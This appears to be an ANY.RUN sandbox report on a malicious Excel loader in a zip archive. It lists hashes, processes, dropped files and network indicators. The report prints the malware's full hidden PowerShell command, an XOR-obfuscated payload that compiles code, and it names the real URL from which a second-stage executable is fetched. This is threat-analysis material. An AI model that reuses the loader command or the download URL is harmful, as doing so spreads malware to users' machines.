analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DELIVERY DETAILS.xls.zip

Full analysis: https://app.any.run/tasks/22d75072-2b1c-478f-8291-cdf5d7444e5a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 12, 2019, 12:04:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

9CB0EDEA520EAF00D0F868828A87F989

SHA1:

8872074C0875832E79F4FE4AB4CEB5AA0E5554EC

SHA256:

3EB56C1CF5FD431600D35B37236273F1C5D209CD281DCADF0519557DD9B517E7

SSDEEP:

384:kuDe8/q9GeKZhsqPaZIslkVVf62f8Kyvky9/cGQqwjWrl/YOVck:k4q9G5Zh+Is6/S1Kh+UZyl/7z

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts Visual C# compiler

      • powershell.exe (PID: 2880)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2880)
    • Application was dropped or rewritten from another process

      • kc3fa99.exe (PID: 3220)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2880)
    • PowerShell script executed

      • powershell.exe (PID: 2880)
    • Creates files in the user directory

      • powershell.exe (PID: 2880)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2880)
  • INFO

    • Manual execution by user

      • EXCEL.EXE (PID: 2488)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2488)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 2488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: DELIVERY DETAILS.xls
ZipUncompressedSize: 48128
ZipCompressedSize: 17095
ZipCRC: 0x9b7323a5
ZipModifyDate: 2019:06:12 12:04:04
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs excel.exe no specs powershell.exe csc.exe cvtres.exe no specs kc3fa99.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2940"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\DELIVERY DETAILS.xls.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2488"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2880powershell -WindowStyle Hidden function k19b8d { param($af9ab4) $t7336 = 'ea575'; $bca67 = ''; for ($i = 0; $i -lt $af9ab4.length; $i+=2) { $a57d8 = [convert]::ToByte($af9ab4.Substring($i, 2), 16); $bca67 += [char]($a57d8 -bxor $t7336[($i / 2) % $t7336.length]); } return $bca67; } $t3d26ca = '10125c595245324c4441000c0e3a3f10125c595245324c4441000c1b65400b155c5a504b285b4350170e45645017175c5450165a383d4016085b50153618464350084f715e54020f5a44410c02460c386f14465e5b0241664e46110458197c2a5a383d4016085b50153618464350084f7b52415e6c3f4740070d5c5415060d544446451201020c5d05383d4e686b15171545411517153e25595b7c08115a45414d435e52470b04590407474d15725b11134c675a0c0f411708454372524135135a5474010547524616431c6a386f4115171545411517451003595e5645124156410c0215524d11044759152c0f41674117414506040403570f1d2c0f41674117415e54535c04505419451241455c0b06155d0c5107041e0e686b15171545411517153e25595b7c08115a45414d435e52470b04590407474d15725b11134c675a0c0f4117084543795854012d5c554704134c151c386c3f1715454115171545114055590c0215444104155c541500194152470b417c5941351547175a530002511d1615475e5b0241420606565703011c5e6c3f17154541151715453a715b592c0c4558471149175c50170f505b0657431917700b15474e650a085b4315584117615c171540565935135a43500615171e68686b15171545411517151514575b5c064146435411085617501d1550455b45035a5859450a50550701041d7e5b11314145150a55045353564d15627c0b1565434745135451045c59571b1510085b43151159545103514d1558401141405e5b1141570e575d571c0c386f41151715454115176e210d597e58150e47431d472a50455b000d06051b010d59151945245b43471c315a5e5b11410817173715597a5a13047852580a134c151945325043790412417247170e4717084507545b460048683a3f4541151715454115444104155c541500194152470b4143585c014144005754041d7e5b11314145151452505401064d157e5b11314145151152570f01500419175c0b1515460c5700061e0e686b383d154541151715454145425709085617461100415e5645085b43150d540702565d001d1e386f41151715454115174e686b1517154541151715454115177c0b156543474515060e070457571708450e03560203495e060c0759511f175555055401535450065755500553005c431c1e0e686b1517154541151715454115175c03411d43065c53540157455c08177c0b156543474b3b50455a4c6c3f1715454115171545411517151e6c3f17154541151715454115171545411517520a155a175e0758075300075a383d1545411517154541151715451c383d386f4115171545411517154541157e5b11314145150d040706035302150a15155004565707591d43065c5354015749415e060c0759511f1757550554015354500103555705070007560003055552050000555500151c4c5a383d1545411517154541151715450853171d0d040706035302150a0845285b436511131b6d50170e1c3a3f4541151715454115171545414e3a3f45411517154541151715454115171545065a435a450a570e070154570c386f4115171545411517154541154a386f6c3f17154541151715454115171530285b4365111315420050075417084549607e5b113141451c505a383d154541151715454115171545145c594145190405575757150a15555a383d1545411517154541151715450853171d440a50550701041d5f505750030156494140020003001917051d55051b150a1441174d54535705034c48383d1545411517154541151715451a383d15454115171545411517154541151715020e4158150e030c055150030e3a3f454115171545411517154541483a3f454115171545411517154541774e41003a68175707590c0302455c154c15551906061945514d51534941054f0c5541480c386f4115171545411517154541157e5b11314145151753545253455c157a5417125d56594b20595b5a0629725b5a0700591f064c5a383d1545411517154541151715452c5445460d005919760a114c1f5707590c03024941051b1517535452534941061e0e686b15171545411517154541151744520304521d0b0442177c0b156543474d0950050453575619610a285b430351491c171e45514d070554031c1b1517535452534941061e0e686b383d5e0758075300075b383d3c6c68625257260d5c525b11414552500458150a150b044217620003765b5c000f411f1c5e6c3f3e3c6c1241455c0b06155204525503170845245b415c170e5b5a500b151b705011275a5b5100136556410d497059430c135a5958000f4119661504565e5409275a5b5100131b7645150d5c545411085a59710415541e154e41176b690e020651545c5817171e450a040e575d051d150107510103515053171e0e686b3c3e3c150450560c4b255a405b090e5453730c0d501f5e5458570f514d43055304505504030255070156010054010253515704060551555103065002050e0551505702015000050f01005453030154000504055d540c020754000705075c565100055052050301005704005352530700075656070753550201550551555102074748191750545601011c5e6c3f3e3c6c3147585600124664410413417e5b030e155f030759061708450f50401535135a5450161266435417157c59530a4950060251571c0c386f683c3e65170e565246164f66435417151d5f030759061e0e686b383d15454115171545411517154513504340170f15070e686b1517154541151715186c3f3e3c1514575b5c0641464354110856174611135c5952450a040e575d051d444117085b501510580c00565048383d15454115171545414e3a3f6c683c444117085b50150e02530e500002150a15470454020250430e3a3f4541151715454115171545414643470c0f52175a530002511558416643470c0f5219700811414e0e686b151715454115171545411517530a13151f5c0b15155e155841050c150c410917405c580254004b2d50595211090e175c454a0817074c6c3f1715454115171545411517151e6c3f17154541151715454115171545411517571c1550174554505455575d410817760a0f435247114f6158771c15501f405c580254004b3240554611135c59524d081917074c4d1506034c5a383d154541151715454115171545411517150a57540053454a08171d060954451c4d1104065407030d176b450a56510c0004566c1d0c411a17074c4110175e06070c5250064f79525b02155d6a1c5e6c3f171545411517154541151715186c3f3a3f45411517154541151715454147524110135b175a530002510e686b1517154541151715186c3f4a'; $t3d26ca2 = k19b8d($t3d26ca); Add-Type -TypeDefinition $t3d26ca2; [s4598d]::h525c8a(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3964"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\g0jueev2.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
2612C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES5695.tmp" "c:\Users\admin\AppData\Local\Temp\CSC5694.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
3220"C:\Users\admin\AppData\Roaming\kc3fa99.exe" C:\Users\admin\AppData\Roaming\kc3fa99.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 399
Read events
1 290
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
3
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
2488EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR4771.tmp.cvr
MD5:
SHA256:
2880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VUP3CL0Y08A86MZNHX42.temp
MD5:
SHA256:
2612cvtres.exeC:\Users\admin\AppData\Local\Temp\RES5695.tmp
MD5:
SHA256:
3964csc.exeC:\Users\admin\AppData\Local\Temp\g0jueev2.dll
MD5:
SHA256:
3964csc.exeC:\Users\admin\AppData\Local\Temp\g0jueev2.out
MD5:
SHA256:
2880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2880powershell.exeC:\Users\admin\AppData\Local\Temp\g0jueev2.cmdlinetext
MD5:4F06AD8D9B501BA83E7B5A6CD9C24CA9
SHA256:16665893F3B3B6545BB7F1E529122C0D2888A5FEBD2742DBB389E6699D3B6370
2880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12530a.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2880powershell.exeC:\Users\admin\AppData\Roaming\kc3fa99.exeexecutable
MD5:15F97019AAAD7D02EE21C82B62957A8A
SHA256:5C97083B0E65C9D0F9837139A910D5B57ED1D0DDD07394F6043AA4FF2FBCA0BE
2488EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\DELIVERY DETAILS.xls.LNKlnk
MD5:E6BC9EC478B049982D3146B7C9EB443E
SHA256:829D80D85E0596E92959EA1CDFDE9775269B8E369738B557D93FD08A938CE33B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2880
powershell.exe
GET
200
192.185.164.101:80
http://ahstextile.com/js/file/GHHGfa/THGBBG89.exe
US
executable
668 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2880
powershell.exe
192.185.164.101:80
ahstextile.com
CyrusOne LLC
US
suspicious

DNS requests

Domain
IP
Reputation
ahstextile.com
  • 192.185.164.101
suspicious

Threats

PID
Process
Class
Message
2880
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2880
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144